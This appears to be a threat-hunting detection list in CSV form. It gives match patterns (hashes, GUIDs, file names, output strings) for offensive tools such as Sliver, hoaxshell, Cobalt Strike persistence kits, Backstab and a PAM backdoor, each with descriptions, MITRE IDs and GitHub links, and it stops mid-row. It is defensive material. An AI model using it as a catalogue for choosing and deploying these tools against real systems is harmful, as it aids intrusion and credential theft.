"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" 
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443*",".{0,1000}b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed*",".{0,1000}b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B9635D08-2BB2-404B-92B7-6A4981CB34F3*",".{0,1000}B9635D08\-2BB2\-404B\-92B7\-6A4981CB34F3.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4*",".{0,1000}b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa*",".{0,1000}b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9*",".{0,1000}b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e*",".{0,1000}b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c*",".{0,1000}ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813*",".{0,1000}ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679*",".{0,1000}ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389*",".{0,1000}ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - 
T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476*",".{0,1000}ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BA9D2748-1342-41A3-87F2-343E82D99813*",".{0,1000}BA9D2748\-1342\-41A3\-87F2\-343E82D99813.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3*",".{0,1000}baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*babelstrike.py -*",".{0,1000}babelstrike\.py\s\-.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*BabelStrike-main*",".{0,1000}BabelStrike\-main.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415*",".{0,1000}bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. 
currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*Backdoor did not understand the request*",".{0,1000}Backdoor\sdid\snot\sunderstand\sthe\srequest.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Backdoor has been set up successfully*",".{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor is already removed :)*",".{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor is already set up ;)*",".{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor 
LNK*",".{0,1000}Backdoor\sLNK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Backdoor sent unrecognizable message:*",".{0,1000}Backdoor\ssent\sunrecognizable\smessage\:.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Backdoor.*",".{0,1000}Backdoor\..{0,1000}","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*backdoor.asp*",".{0,1000}backdoor\.asp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.aspx*",".{0,1000}backdoor\.aspx.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.jsp*",".{0,1000}backdoor\.jsp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.php*",".{0,1000}backdoor\.php.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*BackdoorableScript*",".{0,1000}BackdoorableScript.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that 
searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*--backdoor-all*",".{0,1000}\-\-backdoor\-all.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*BackdoorLNK*",".{0,1000}BackdoorLNK.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backdoorlnkdialog*",".{0,1000}backdoorlnkdialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backstab.exe*",".{0,1000}backstab\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab.sln*",".{0,1000}Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware 
protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*backstab.x64.*",".{0,1000}backstab\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*backstab.x86.*",".{0,1000}backstab\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*Backstab/Driverloading*",".{0,1000}Backstab\/Driverloading.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab-master*",".{0,1000}Backstab\-master.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*BackupOperatorToDA.cpp*",".{0,1000}BackupOperatorToDA\.cpp.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" 
"*BackupOperatorToDA.exe*",".{0,1000}BackupOperatorToDA\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupOperatorToDA.sln*",".{0,1000}BackupOperatorToDA\.sln.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupOperatorToDA-master*",".{0,1000}BackupOperatorToDA\-master.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupPrivSAM \\*",".{0,1000}BackupPrivSAM\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*backupprivsam.*",".{0,1000}backupprivsam\..{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 